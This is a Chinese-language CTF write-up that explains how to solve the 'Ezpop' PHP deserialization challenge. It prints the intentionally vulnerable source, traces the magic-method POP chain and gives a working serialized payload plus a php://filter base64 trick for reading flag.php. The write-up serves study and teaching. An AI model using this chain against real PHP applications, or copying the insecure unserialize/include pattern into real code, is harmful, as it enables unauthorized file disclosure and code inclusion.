題目Ezpop說明了該題的考點(博主寫完之后參考其他博客時才發現這里的pop其實有特殊含義),這里引用下其他博主的解釋:
(原文鏈接:https://blog.csdn.net/weixin_45785288/article/details/109877324)
這個題目就是關於這個POP的一個具體題目場景,做題時就可以大概感受POP是如何發揮作用的。
打開頁面,直接明了的給出了源碼和目標——flag.php。
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
從非定義部分的代碼開始審查。
在傳入參數pop被設置時對其進行反序列化,那么再查看此前定義的類中哪些具有和反序列化相關的魔術方法,調用這些魔術方法中設置的代碼,就可以執行此處反序列化之外更多的代碼,從而實現我們讀取flag.php中flag的要求。
Modifier類中append()方法會將傳入參數包含,而此處魔術方法__invoke中設置了將Modifier類中的var屬性作為傳入值來調用append()函數,所以在這里需要讓屬性var的值為flag.php,再觸發魔術方法__invoke即可。魔術方法__invoke被自動調用的條件是類被當成一個函數被調用,故接着來尋找和函數調用有關的代碼。
在Test類中有兩個魔法函數__construct和__get,但魔法函數__construct這里用不上只需要關注魔法函數__get就好。魔法函數__get中設置了屬性p會被當做函數調用,剛好符合前面Modifier類中的要求。故需要再觸發魔法函數__get即可,魔法函數__get會在訪問類中一個不存在的屬性時自動調用,那就需要尋找和調用屬性相關的代碼。
Show類中有三個魔術方法,同樣魔術方法__construct這里也用不上,在魔術方法__toString中會返回屬性str中的屬性source,如果剛剛提到的source屬性不存在,那么就符合了Test類中的要求,那這里。魔術方法__toString在類被當做一個字符串處理時會被自動調用,在魔術方法__wakeup則將屬性source傳入正則匹配函數preg_match(),在這個函數中source屬性就被當做字符串處理。最終這個魔術方法__wakeup又在類被反序列化時自動調用。這樣從Test類中append()方法到Show類中的魔術方法__wakup就形成了一條調用鏈,這就是POP的一個使用樣例,而題目——Ezpop就說明了這題設計的知識。(
綜上所述,一次經歷了如下過程:
反序列化->調用Show類中魔術方法__wakeup->preg_match()函數對Show類的屬性source處理->調用Show類中魔術方法__toString->返回Show類的屬性str中的屬性source(此時這里屬性source並不存在)->調用Test類中魔術方法__get->返回Test類的屬性p的函數調用結果->調用Modifier類中魔術方法__invoke->include()函數包含目標文件(flag.php)
最終payload代碼如下(刪去了源碼中一些不必要的部分):
<?php
class Modifier {
protected $var="flag.php";
}
class Show{
public $source;
public $str;
}
class Test{
public $p;
}
$a = new Show();
$b= new Show();
$a->source=$b;
$b->str=new Test();
($b->str)->p=new Modifier();
echo urlencode(serialize($a)); #因為Modifier類中的屬性var為protected,將序列化后結果進行URL編碼后可省略考慮不可見字符直接復制而丟失
#結果為O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A8%3A%22flag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
?>
但是直接包含flag.php得不到flag,需要讀取flag.php的源碼,直接包含只能見到如下內容。
那用偽協議來讀取flag.php源碼即可,這里將Modifier類的屬性var的值替換掉。
protected $var="php://filter/read=convert.base64-encode/resource=flag.php";
對獲得的內容base64解密即可獲得flag。
